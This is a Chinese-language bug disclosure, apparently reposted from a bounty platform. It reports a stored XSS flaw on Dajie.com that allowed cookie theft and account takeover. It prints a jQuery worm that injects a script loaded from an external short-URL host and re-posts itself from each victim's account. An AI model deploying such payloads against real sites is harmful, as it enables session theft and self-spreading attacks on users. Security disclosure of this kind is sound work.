网站地图    收藏   

主页 > 后端 > 网站安全 >

大街网某功能储存型XSS 致首页等位置蠕虫+获取用

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 之前发了个大街网非你莫属官网的漏洞,给送礼物了,还打电话表示感谢(开始电话号码写错了,打到别人那去了,悲催),很开心。就去再转了转,就又挖到了一个,这个比之前那个...

之前发了个大街网非你莫属官网的漏洞,给送礼物了,还打电话表示感谢(开始电话号码写错了,打到别人那去了,悲催),很开心。就去再转了转,就又挖到了一个,这个比之前那个危害严重很多。很多位置有显示,消息会以多种途径推送给好友,也会随机显示在板块主页和大街网首页,导致其他用户中招。可以蠕虫,可以盗取cookie,很霸气啊!
 
大街网职场真心话功能存在xss,可以盗号,蠕虫等。
 
此处有对",<,>进行过滤,但是过滤的不彻底,只要构成原标签对闭合即可绕过。
 
1 大街网 职场真心话 功能存在xss,",<,>都没过滤,就随便构造了下,位置在插图的src处。(因为限制了长度,而且判断了图片的域名,所以这里插入代码后,部分图片不能正常加载)
 
图1
 
 
2 构造的恶意代码。
 
图2
 
 
 
3 盗取的cookie。
 
图3
 
 
 
4 随便拿一个cookie,并成功登录证明下。
 
图4
 
 
 
5 另外需要说明,这个职场真心话的图片也会在大街网首页显示,也会在职场真心话板块首页显示,而且会以新鲜事以及短消息的形式推送给好友(直接登录后的网站首页就可以看到新鲜事消息),所以危害还是蛮大的。
 
 
 
6 下面做一下蠕虫的演示。
 
7 缺陷位置
 
图1
 
 
 
8 用小号1登录,抓包后修改post数据,插入的恶意代码,由于第二个图片是在好友那里推送显示的,所以不做更改。写好之后就用charles提交一条恶意带有蠕虫的提问消息。
 
图2
 
 
 
9 换小号2登录,可以看到通过这个代码,好友小号2看到的消息直接在首页显示,并且完全无异样。
 
图3
 
 
10 点击进去,就中招了,用F12看到代码没有过滤(复制到txt中看的)。
 
图4
 
 
11 可以小号2在神不知鬼不觉的情况下已经发了一条和小号1一样的带有蠕虫的提问消息。
 
图5
 
 
12 再用小号1登录去看,和上面一样也是完美显示的。
 
图6
 



 
13 下面是自己写的一段简单的蠕虫代码(由于post数据没有加密参数,以及网站使用了jq,所以写起来很简单)
 
function test(){
jQuery.post("http://ox.dajie.com/question.do?m=ask",{
"ajax":"1",
"sexual":"0",
"portraiturl":"><script src=//url.cn/BY3LeX></script><img ",
"portraithumburl":"/2013/01/12/676e/6969/6e67597a/480963/2757997309101287.120120.png",
"content":"漂亮不?",
"catalog":"1",
"share":"",
"huacao":"" })
}
test()
 
当然我测试的时候是有控制两个小号的ID的。
 
最后,贵公司之前送的礼物偶很喜欢,如果这次给送礼物的话,就不要送咖啡壶了,已经有了,嘿嘿。。。
 
 
最后,可能有人会感觉这个帖子描述的挺啰嗦的,的确是哦,因为第一次写的貌似太简单(只证明了可以盗取cookie),也没有证明蠕虫危害,所以十几天了一直没给审核,所以就重新详细描述证明后再提交了,剑心看到之后要给通过啊!插这么多图片不容易诶。。。
 
 

 
修复方案:

过滤特殊字符
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论